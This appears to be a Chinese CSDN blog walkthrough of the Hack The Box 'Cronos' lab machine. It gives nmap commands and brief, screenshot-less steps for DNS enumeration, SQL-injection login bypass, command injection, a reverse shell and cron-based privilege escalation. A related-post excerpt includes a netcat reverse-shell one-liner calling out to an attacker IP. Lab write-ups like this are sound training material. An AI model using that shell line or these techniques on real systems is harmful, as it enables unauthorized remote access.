htb-cronos

已于 2022-09-16 09:56:05 修改
阅读量678 收藏
点赞数
分类专栏: htb 文章标签: 安全
于 2022-09-16 01:09:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55772907/article/details/126878262
版权

目标IP 10.10.10.13    kali的vpn 10.10.16.5

端口扫描

sudo nmap -n -v -sS -p- 10.10.10.13 --max-retries=0 -oN allport.txt -Pn

 

nmap -n -v -sC -sV -p $(cat allport.txt |grep ^[0-9]|cut -d / -f1|tr '\n' ','|sed s/,$//) 10.10.10.13 -oN nmap.txt -Pn

因为我们发现53端口,因此要解析其地址,获得两个域名

还有其他方法解析

按照顺序输入后,解析得到一个子域名

使用其他字典解析

 查看80端口,发现没有robots.txt

 绑定hosts

添加

爆破目录,却没有任何发现

 访问对应子域名,这里可以测试弱口令,sql注入,xss,ssti注入等,刚开始爆破发现难以爆破

 这里是sql注入,直接登录,密码随意,账号需要按照下图进入

进入之后发现是命令注入

查看是否有curl

 写一个shell

 开个监听

开启服务器

web应用上执行

 查看权限

 变成交互式shell

和之前的提权一样,把自己的文件上传上去,然后让其运行,查看情况

 下载对应提权搜索工具

 添加使用权限

 执行命令

发现定时任务

 找到目标文件

查看文件代码

在攻击机写一个文件

 下载并查看文件内容

查看其权限

 修改文件名字

开启监听

反弹成功

诡墨佯
关注
专栏目录
HTB靶场系列 linux靶机 靶机cronos
m0_57221101的博客
01-19 1770
勘探 基本操作先用nmap扫一下 nmap 10.10.10.13 Starting Nmap 7.80 (https://nmap.org) at 2020-04-07 21:01 EDT Nmap scan report for 10.10.10.13 Host is up (0.014s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain ..
hackthebox-cronos(考点:dns/sql注入/crontab)
冬萍子癸水
04-11 382
nmap 看到53端口就应该想到dns,在/etc/hosts/里加上10.10.10.13 cronos.htb 然后再打开80,进入 cronos.htb。看看网页。以及dirbuster扫,但都没什么有价值的信息。 没啥突破口啊。继续信息搜集。 看来针对端口53,还要再利用 dig axfr @10.10.10.13 cronos.htb host -l cronos.htb 10.10...
HTB-Cronos
TA不懒,但还没有添加简介
12-06 610
HTB-Cronos
oscp——HTB——Cronos
王嘟嘟的博客
06-02 438
0x00 前言 0x01 信息收集 0x02 Web——Webshell 这里开放了80端口,发现80端口没啥东西,扫目录也没扫出来啥。 看到开放了53端口,知道是开启了dns服务 使用nslookup nslookup server 10.10.10.13 10.10.10.13 这类可以看到10.10.10.13的相对应的域名 查看一下其他的域名 dig axfr cronos.htb @10.10.10.13 这里可以看到还有其他的域 测试admin.cronos.htb,发现这里是一个
HTB打靶日记:Cronos
m0_73998094的博客
12-27 565
HTB打靶日记:Cronos
HTB靶机07-Cronos-WP
灰蜗牛
05-05 717
HTB靶机07-Cronos-WP
HackTheBox:Cronos笔记
X
04-19 1293
HackTheBox:Cronos笔记 HackTheBox:Cronos WalkthroughHackTheBox:Cronos笔记信息收集NMAP53端口:获得域名80端口:Laravel -> DNS Zone Transfer -> Admin域传送漏洞digNmapnslookup反弹shell提权定时任务反思与总结reference 信息收集 NMAP # nmap...
HTB靶场系列 linux靶机 Nineveh靶机
m0_57221101的博客
01-17 4526
勘探 nmap勘探 nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http
Hackthebox - Previse 靶场实战
路西菲尔的故事汇
08-09 1986
Hackthebox - Previse 靶场实战 靶场信息 靶场类型 信息搜集 使用nmap进行端口扫描 ┌──(root????root)-[~/Desktop] └─# nmap -A -sS -sC -sV -p- 10.10.11.104 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 22:27 CST Nmap scan report for 10.10.11.104 Host is up (0.25s latency). No
Cronos -- hack the box
neal1991的专栏
03-15 371
IntroductionTarget machine: 10.10.10.13(OS: linux)Kali linux: 10.10.16.44EnumerationF...
黑客入门,从HTB开始
热门推荐
neal1991的专栏
10-20 4万+
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场。 之前在 HTB 也玩过一些机器。里面的机器难度有好几个档次,insane 难度的一般都是极其困难的,这种机器一般让我对着大神的 Writeup 我可能都没有办法复现出来。之前也有在公众号上分享过几篇 H...
Hack the box靶机 cronos
菜浪马废的博客
05-19 412
添加10.10.10.13 cronos.htb 到/etc/hosts 同样添加到/etc/hosts 访问一下 直接绕过了 一看就是远程命令执行 抓包 确认完毕 上nc 10.10.14.8 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.118 1234 >/tmp/f root用户在运行artisan 写个PHP脚本 替换它 然后连接 我用的php-rever.
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 459
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
等保测评:如何进行有效的安全合规性审查
2301_79955948的博客
10-18 451
等保测评(信息安全等级保护测评)是一项至关重要的安全合规性审查工作,旨在帮助组织保障信息系统的安全性、合规性,有效应对安全风险,提升整体安全防护水平。
【红日安全】vulnstack (一)
m0_71944965的博客
10-18 308
靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 下载解压后在VM中打开目标跟我们处于同一个网段先查一下我们自己的IP,用 ifconfig 查看攻击机的IP为192.168.64.131探测一下跟我们同一网段下的主机有哪些,用Kali自带的arp扫描器扫描同一网段下的主机,发现了同一网段下的不同IP,判断它就是要渗透的主机。 扫到IP之后接下来扫描端口,发现它开启了、端口 访问一下80端口,发现是phpStudy探针界面,在其中发现了它的操作
面对AI算力需求激增,如何守护数据中心机房安全?
最新发布
HKT香港电讯的博客
10-18 263
面对AI时代算力需求飙升所带来的更高安全要求和挑战,数据中心机房需要具备更完善的容灾能力及应急预案。同时应从多个方面入手,全面提升安全防护能力,从而有效应对安全隐患及突发事故。
常见的内网渗透思路及方法(包含示例)
xixixi7777的博客
10-11 1094
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞。
【京准电钟】“安全卫士”:卫星时空安全隔离防护装置
NTP授时服务器
10-18 277
【京准电钟】“安全卫士”:卫星时空安全隔离防护装置
安全 | AWS S3存储桶安全设计缺陷分析
2401_82664371的博客
10-18 535
默认情况下,Amazon S3 是安全的。创建后,只有资源所有者才能访问他们创建的 Amazon S3 资源。
ROS双线HTB流控配置手册:保障游戏体验
ROS双线HTB(Hierarchical Token Bucket,层次化令牌桶)是一种高级的流量整形技术,用于在RouterOS操作系统中实现精细化的网络带宽管理。此手册主要针对如何在双线环境中,如电信和联通线路,配置HTB以确保数据流的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值